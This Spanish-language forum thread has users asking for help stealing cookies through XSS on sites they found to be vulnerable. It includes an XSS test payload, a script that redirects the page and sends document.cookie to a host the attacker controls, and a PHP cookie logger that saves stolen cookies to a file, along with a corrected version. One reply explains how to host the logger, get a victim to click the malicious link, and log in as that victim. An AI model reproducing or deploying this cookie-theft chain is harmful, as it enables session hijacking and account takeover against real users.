cuestiones sobre XSS

Hola a todos.... estoy haciendo algunas pruebas en páginas que parecen ser vulnerables a XSS pero no consigo guardar la info de la cookie o direccionar la página....

Estoy tratando de hacerlo en dos páginas diferentes, en las que si introduzco en el buscador de la pagina:

Código:

<h1>XSS</h1>

<script>alert(document.cookie)</script>

obtengo el resultado deseado...osea XSS en grande y la cookie consecutivamente.

Pero si hago esto:

Código:

No consigo que se guarde la cookie en el archivo de texto..... (el codigo q guarda la cookie en un txt es:

Código:

<?
$cookie = $_GET['cookie'];
$fichero = fopen("cookies.txt","a");
fwrite($fichero, "$cookie \n");
fclose($fichero);
?>

tampoco consigo q se redireccione si solo pongo:

Código:

No se si esto es normal (pq filtren algo mas)o estoy haciendo algo mal...

Gracias de antemano a todos.....un saludo

pd: Perdon por preguntar algo tan manido como el XSS pero no consigo solucionarlo por mas que he tratado de hacerlo......

Citar

Citar

<?
$cookie = $_GET['cookie'];
$fichero = fopen("cookies.txt","a");
//fwrite($fichero, "$cookie \n");
fwrite($fichero, $cookie.chr(13).chr(10));
fclose($fichero);
?>

Gracias por tu respuesta!!! que estupido soy... le faltaba crear el hiperenlace ..........

Tambien el salto de linea y el retorno de carro....

muchas gracias.. voy a ver si va bien

buenas amigos leyendo este post me emocione averiguar mas sobre XSS y lei varos tutos sobre ello..

bueno mi pregunta es la siguiente

en la web que encontre introdusco en el campo de busqueda

Citar

<h1>XSS</h1>

<script>alert(document.cookie)</script>

y perfecto me sale un mensaje de alert y luego el texto XSS en grande

luego siguiendo el post

Citar
<script>window.location.href='http://miweb.es/pillagalleta.php?cookie=’+document.cookie;</script>

Citar
<?
$cookie = $_GET['cookie'];
$fichero = fopen("cookies.txt","a");
//fwrite($fichero, "$cookie \n");
fwrite($fichero, $cookie.chr(13).chr(10));
fclose($fichero);

no se exatamente que hace pero por lo que se ve a simple vista va a guardar todos los cookie en la web que yo le estoy diciendo verdad...

es decir que pra esto tengo que tener una web dond el mande los cookie...

Sí, necesitas una web con soporte de php.

Eso es, debes crearte una web (por ejemplo en iespana) y pones un archivo en php que guarde la cookie (con el codigo que has visto en el post). Con eso si consigues q la victima pulse sobre el enlace malicioso pues almacenas su cookie y puedes loguearte como si fueses el..... tambien pueden hacerse deface y otras cosas mas con XSS ...pero lo malo es que alguien debe pulsar el enlace.........

Espero q te diviertas ^^

pd: aun no consigo almacenar la cookie con la ayuda de lympex.. pero ya me falta menos

hard-h2o modding Foros de ayuda Yashira.org Videojuegos indetectables.net

Noticias Informatica Seguridad Informática ADSL Foros en español eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.